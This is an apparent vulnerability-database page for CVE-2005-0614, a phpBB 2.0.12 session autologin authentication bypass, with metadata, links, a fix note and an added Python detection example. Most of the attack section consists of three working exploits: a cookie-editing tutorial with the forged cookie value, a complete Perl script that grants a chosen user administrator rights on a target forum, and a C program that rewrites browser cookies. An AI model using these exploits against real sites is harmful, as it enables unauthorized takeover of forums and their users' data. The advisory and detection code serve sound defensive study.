CVE-2005-0614
CVSS 7.5
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:13:03

[Original] sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.


[CNNVD] phpBB Multiple Vulnerabilities (CNNVD-200505-776)

sessions.php in phpBB 2.0.12 and earlier allows a remote attacker to obtain administrator privileges via an autologinid value in a cookie.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:phpbb_group:phpbb:2.0.12
cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.11
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:1.2.0
cpe:/a:phpbb_group:phpbb:2.0.7
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0614
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0614
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-776
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110970201920206&w=2
(UNKNOWN)  BUGTRAQ  20050301 phpBB <= 2.0.12 UID Exploit
http://marc.info/?l=bugtraq&m=110999268130739&w=2
(UNKNOWN)  BUGTRAQ  20050304 phpBB 2.0.12 Session Handling Administrator Authentication Bypass
http://www.phpbb.com/phpBB/viewtopic.php?t=267563
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=267563

- Vulnerability information

phpBB Multiple Vulnerabilities
High / Unknown
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
sessions.php in phpBB 2.0.12 and earlier allows a remote attacker to obtain administrator privileges via an autologinid value in a cookie.

- Advisories and patches

No data

- Vulnerability information (871)

phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) (EDBID:871)
php webapps
2005-03-11 Verified
Author: Ali7 (port 0)
phpBB 2.0.12 Session Handling Authentication Bypass

Easy-to-use exploit.

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.

1. Simply visit the forum using Mozilla Firefox, and be sure that the cookie is made (:

2. Close the browser.

3. Open cookies.txt (located in "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP, for example ;)

and you will find something like:
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain of the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data << as a visitor

4. OK, let's do it!
Now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

Save cookies.txt.

5. Open your browser and go to the exploited forum.
>> Enjoy High Permission mode!! :D

Complete the mission by clicking "Go to Administration Panel".

--------------------------------------------------------------------------------

Written by: Ali7
E-mail: ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]

- Vulnerability information (889)

phpBB <= 2.0.12 Change User Rights Authentication Bypass (EDBID:889)
php webapps
2005-03-21 Verified
Author: Kutas (port 0)
#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulnerability in the autologinid variable
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives a user on a vulnerable forum administrator rights.
# You should register the user before using this ;-)

#   by Kutas, kutas@mail15.com
# P.S. I don't know who made the original exploit, so I cannot place a (c) here...
# but greets go to Paisterist who made an exploit for Firefox cookies...

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

if (@ARGV < 3) {
    print q(
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
 i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
);
    exit;
}

my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $user  = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://" . $host . $path;

# Forged phpbb2mysql_data cookie: a serialized PHP array with
# autologinid => true (boolean) and userid => "2" (the default admin).
# Pre-2.0.13 sessions.php compares autologinid with the stored key
# using ==, so boolean true matches any non-empty key.
my $browser    = LWP::UserAgent->new();
my $cookie_jar = HTTP::Cookies->new();
$browser->cookie_jar($cookie_jar);
$cookie_jar->set_cookie(
    0, "phpbb2mysql_data",
    "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
    "/", $host
);

if (defined $proxy) {
    $proxy =~ s{^http://}{};
    $browser->proxy("http", "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path";
print " using proxy $proxy" if defined $proxy;
print "\n";

my $response = $browser->get($request);
die "Error: ", $response->status_line
    unless $response->is_success;

# A logged-in page carries the private-message link; a guest page does not.
if ($response->content =~ m/phpbbprivmsg/) {
    print "\n   Forum is vulnerable!!!\n";
} else {
    print "Sorry... Not vulnerable\n";
    exit;
}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
my ($sid) = $response->content =~ /sid=([\w\d]*)/;
$sid = '' unless defined $sid;

# Look the target user up in the admin panel's user-permissions page.
$request .= "admin/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
    $request,
    [
        'username'   => $user,
        'mode'       => 'edit',
        'mode'       => 'user',
        'submituser' => 'Look+up+User',
    ],
);
die "Error: ", $response->status_line
    unless $response->is_success;

my ($uid) = $response->content =~ /name="u" value="(\d*)"/;
if (defined $uid and length $uid) {
    print "   Done... ID=$uid\n++++++++++++++++++++++++++++++\n";
} else {
    print "No user $user found...\n";
    exit;
}
print "Trying to give user:$user admin status...\n";

# Submit the same form again with userlevel=admin for that user id.
$response = $browser->post(
    $request,
    [
        'userlevel' => 'admin',
        'mode'      => 'user',
        'adv'       => '',
        'u'         => $uid,
        'submit'    => 'Submit',
    ],
);
die "Error: ", $response->status_line
    unless $response->is_success;
print "   Well done!!! $user should now have admin status..\n++++++++++++++++++++++++++++\n";

# milw0rm.com [2005-03-21]

- Vulnerability information (897)

phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) (EDBID:897)
php webapps
2005-03-24 Verified
Author: str0ke (port 0)
/* Paisterist's code was nice but here's mil's version.
 * precompiled: http://www.milw0rm.com/sploits/897.rar
 * Usage:
 * bcc32 897.cpp
 * and place the exe in your firefox profile dir.
 * Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
 * Visit a site with phpbb, close the browser, double click the exe, browse site.
 * This gives anonymous users administrator rights only.
 * Yeah, it's lame, I'm bored, kthnx. If something goes wrong clear cookies.
 *
 * /str0ke
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a newly allocated copy of text with every occurrence of find
 * replaced by replace. Based on VeNoMouS's love cow code; the buffer is
 * sized for all occurrences and filled with memcpy, so it never relies on
 * an uninitialised buffer the way strcat on a fresh malloc would. */
char *search_and_replace(const char *text, const char *find, const char *replace)
{
    size_t len_find = strlen(find), len_replace = strlen(replace), len_text = strlen(text);
    size_t count = 0;
    const char *p;
    char *new_text, *out;

    if (len_find == 0)
        return NULL;
    for (p = strstr(text, find); p != NULL; p = strstr(p + len_find, find))
        count++;

    new_text = (char *)malloc(len_text - count * len_find + count * len_replace + 1);
    if (new_text == NULL) {
        printf("malloc issue...\n");
        return NULL;
    }
    out = new_text;
    p = text;
    for (;;) {
        const char *found = strstr(p, find);
        if (found == NULL) {
            strcpy(out, p);   /* copy the tail, including the terminator */
            break;
        }
        memcpy(out, p, (size_t)(found - p));
        out += found - p;
        memcpy(out, replace, len_replace);
        out += len_replace;
        p = found + len_find;
    }
    return new_text;
}

int main(void)
{
    FILE *pFile;
    long lSize;
    char *buffer, *patched;

    /* Anonymous visitor's phpbb2mysql_data cookie (empty serialized array)
     * and the forged one: autologinid => true, userid => "2". */
    const char *anon   = "a%3A0%3A%7B%7D";
    const char *forged = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D";

    /* Binary mode so ftell's byte count matches what fread returns. */
    pFile = fopen("cookies.txt", "rb");
    if (pFile == NULL) exit(1);

    fseek(pFile, 0, SEEK_END);
    lSize = ftell(pFile);
    rewind(pFile);

    buffer = (char *)malloc((size_t)lSize + 1);   /* +1 for the terminator strlen needs */
    if (buffer == NULL) exit(2);
    lSize = (long)fread(buffer, 1, (size_t)lSize, pFile);
    buffer[lSize] = '\0';
    fclose(pFile);

    patched = search_and_replace(buffer, anon, forged);
    if (patched == NULL) exit(3);

    pFile = fopen("cookies.txt", "wb");
    if (pFile == NULL) exit(4);
    fputs(patched, pFile);
    fclose(pFile);
    free(patched);
    free(buffer);
    return 0;
}

// milw0rm.com [2005-03-24]

- Vulnerability information

14242
phpBB sessions.php autologinid Remote Privilege Escalation
Remote / Network Access, Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability description

phpBB contains a flaw that may allow a remote attacker to gain unauthorized privileges. The issue is triggered by the comparison of "sessiondata['autologinid']" (taken from the attacker-controlled, PHP-serialized phpbb2mysql_data cookie) with "auto_login_key" in sessions.php: the comparison is loose (PHP's == rather than ===), so a serialized boolean true in the cookie compares equal to any non-empty stored key. Further, phpBB does not reset the $userdata['user_level'] variable after a failed autologin. It is therefore possible for a remote attacker to set a specially crafted cookie whose userid is that of an administrator (user_id 2 in a default install, as the exploits above use) and be treated as that user, resulting in a loss of integrity.
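The following is an added example, not phpBB code and not the exploit authors' code. It decodes the two phpbb2mysql_data cookie values quoted in the tutorial above (PHP serialize() format, URL-encoded), models the PHP loose == that the pre-2.0.13 check relied on next to the strict === form, and gives a detection rule for forged autologin cookies. vulnerable_autologin and fixed_autologin are a reconstruction of the check as the description states it, not phpBB's source; USER_KEYS is a constructed stand-in for the users table with a made-up key.

```python
# Added example (not phpBB code, not the exploit authors' code): decodes the
# phpbb2mysql_data cookie values quoted on this page, models the PHP loose ==
# that the pre-2.0.13 sessions.php check relied on, and gives a detection rule
# for forged autologin cookies. USER_KEYS is a constructed stand-in table.
import re
from urllib.parse import quote, unquote

# Cookie values copied from the exploit write-up above.
ANON_COOKIE = "a%3A0%3A%7B%7D"
FORGED_COOKIE = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B"
                 "s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D")
# Constructed: user_id -> stored autologin key (phpBB 2's default admin is uid 2).
USER_KEYS = {2: "0a1b2c3d4e5f60718293a4b5c6d7e8f9"}

def _match(pattern, s, pos):
    m = re.match(pattern, s[pos:])
    if not m:
        raise ValueError("malformed serialized data at offset %d" % pos)
    return m

def _parse_value(s, pos):
    """Parse one PHP-serialized scalar at s[pos:]; return (value, next_pos)."""
    t = s[pos:pos + 1]
    if t == "s":                       # s:<bytelen>:"<bytes>";  (ASCII assumed)
        m = _match(r's:(\d+):"', s, pos)
        start = pos + m.end()
        end = start + int(m.group(1))
        if s[end:end + 2] != '";':
            raise ValueError("bad string length at offset %d" % pos)
        return s[start:end], end + 2
    if t == "i":
        m = _match(r"i:(-?\d+);", s, pos)
        return int(m.group(1)), pos + m.end()
    if t == "b":
        m = _match(r"b:([01]);", s, pos)
        return m.group(1) == "1", pos + m.end()
    raise ValueError("unsupported type %r at offset %d" % (t, pos))

def php_unserialize_flat(data):
    """PHP serialize()d array of scalars -> dict (the shape of the _data cookie)."""
    m = _match(r"a:(\d+):\{", data, 0)
    pos, out = m.end(), {}
    for _ in range(int(m.group(1))):
        key, pos = _parse_value(data, pos)
        val, pos = _parse_value(data, pos)
        out[key] = val
    if data[pos:pos + 1] != "}":
        raise ValueError("array not closed")
    return out

def php_serialize_flat(d):
    """Inverse of php_unserialize_flat; bool is tested before int on purpose."""
    def ser(v):
        if isinstance(v, bool):
            return "b:%d;" % v
        if isinstance(v, int):
            return "i:%d;" % v
        return 's:%d:"%s";' % (len(v.encode()), v)
    return "a:%d:{%s}" % (len(d), "".join(ser(k) + ser(v) for k, v in d.items()))

# The cookie as the browser stores it: URL-encoded serialized array.
def decode_cookie(cookie_value):
    return php_unserialize_flat(unquote(cookie_value))

def build_cookie(session):
    return quote(php_serialize_flat(session), safe="")

def php_loose_eq(a, b):
    """PHP == for the case that matters here: if either side is a bool, the
    other is cast to bool first ("" and "0" are false, other strings true)."""
    def php_bool(v):
        return v not in ("", "0") if isinstance(v, str) else bool(v)
    if isinstance(a, bool) or isinstance(b, bool):
        return php_bool(a) == php_bool(b)
    return a == b

def _uid_and_key(cookie_value):
    sess = decode_cookie(cookie_value)
    uid = sess.get("userid")
    if "autologinid" not in sess or not str(uid).isdigit():
        return None, None
    return int(uid), sess["autologinid"]

def vulnerable_autologin(cookie_value, user_keys):
    """Pre-2.0.13 shape: loose ==, so autologinid => true (b:1) matches any
    non-empty stored key. Returns the user_id that gets logged in, or None."""
    uid, supplied = _uid_and_key(cookie_value)
    key = user_keys.get(uid)
    return uid if key and php_loose_eq(supplied, key) else None

def fixed_autologin(cookie_value, user_keys):
    """Strict (===) comparison: type and value must both match."""
    uid, supplied = _uid_and_key(cookie_value)
    key = user_keys.get(uid)
    return uid if key and isinstance(supplied, str) and supplied == key else None

def is_forged_autologin(cookie_value):
    """Detection: a real autologin cookie carries the key as a string. A bool
    or int autologinid, or an unparsable cookie, indicates this attack."""
    try:
        sess = decode_cookie(cookie_value)
    except ValueError:
        return True
    return "autologinid" in sess and not isinstance(sess["autologinid"], str)
```

Run against the page's forged value, decode_cookie yields {"autologinid": True, "userid": "2"}; vulnerable_autologin accepts it as user 2 while fixed_autologin rejects it, and is_forged_autologin can be applied to the Cookie header of incoming requests (or to a web-server log that records it) to flag attempts, since no legitimate client ever sends a boolean in that field.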

- Timeline

2005-02-27 2001-01-01
2005-02-28 Unknown

- Solution

Upgrade to version 2.0.13 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit
